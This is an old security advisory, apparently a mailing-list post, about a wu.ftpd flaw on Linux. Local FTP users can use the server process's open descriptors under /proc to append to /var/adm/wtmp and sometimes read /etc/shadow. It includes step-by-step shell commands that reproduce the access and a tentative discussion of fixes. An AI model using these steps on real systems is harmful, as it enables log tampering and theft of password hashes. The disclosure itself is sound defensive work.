Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4)

[H.Karrenbeld () ct utwente nl (Henri Karrenbeld)]

Description:

People with local ftp access can use the filedescriptors in /proc of
the iwu.)ftpd process (which is running under their euid) to read and append
to files to which they should not have access. This gives write permission
to /var/adm/wtmp and read access to /etc/shadow, if your ftpd is hacked
in a 'dirty' way to incorporate shadow passwords. The 2.4 version also
gave write access to /var/adm/xferlog. A friend of mine reported write
access to /etc/ftpconversions (with possible root vulnerabilities), but
I have not been able to repeat that (2.4.2 beta 4 appears to be safe in
this)

How to show your sysadmin it works (test done with 2.4.2 beta):

$ ftp -n localhost
user: <yourname>
password: <yourpassword>
ftp> <ctrl-Z>

Now find the process id of the wu.ftpd running:

$ ps -alxw |grep <yourname>
  0   502  2728    46   1  0  527  396 1416fc     S     ?    0:00 -loopback: <yourname>
            ^
            +---- this is the one!

$ cd /proc/2728/fd
$ ls -lG
total 0
lrwx------   1 <yourname>     64 Jul 12 13:07 0 -> [0000]:0
lrwx------   1 <yourname>     64 Jul 12 13:07 1 -> [0000]:0
l-wx------   1 <yourname>     64 Jul 12 13:07 2 -> [0301]:4141
lrwx------   1 <yourname>     64 Jul 12 13:07 3 -> [0000]:0
-r-x------   1 <yourname>     64 Jul 12 13:07 4 -> [0301]:92276
l-wx------   1 <yourname>     64 Jul 12 13:07 5 -> [0301]:24718

$ ls -il /var/adm/wtmp
  24718 -rw-r--r--   1 root     root       183911 Jul 12 13:04 /var/adm/wtmp

So normal access for wtmp is 644, however this 'hard link' into the filesystem
points directly to the inode (24718) and gives you write access to this file
by writing to /proc/2728/fd/5 instead of to /var/adm/wtmp.

If your wu.ftpd has implemented shadow password in a 'dirty' way, there is
also a filedescriptor for /etc/shadow (only this is lr-x, but it still
defeats the entire idea of having a shadow password file).

Other versions of wu.ftpd or other setups might have more or other fd's
opened ( /etc/ftpusers, /etc/ftpaccess,  etc. etc.) but those have not
shown write access on all systems I checked (wu.ftpd 2.4 and 2.4.2 beta,
with linux kernels 1.2.1, 1.2.3, 1.2.8 and 1.2.9).


How to fix?

I'm afraid I don't have enough skills myself to fix this myself, obviously
in involves opening and closing the /var/adm/wtmp after it has been written
to, so the filedescriptor will not be in the /proc filesystem anymore,
however there might be a possible race condition here (actually you could
consider this also a race condition, only a very slow one ;-). While this
is a feasible solution for the use of /var/adm/wtmp, which is only accessed
at login or logoff from ftp, it is not one for /var/adm/xferlog, however
upgrading to 2.4.2 beta 4 (or above) will probable solve the problem for
illegal access to this file.

Other programs?

Well, all the Linux machines I have access to use wu.ftpd, however you
should not be surprised if this trick also works with ftpd of other
origin. Your mileagle may vary.

$) Henri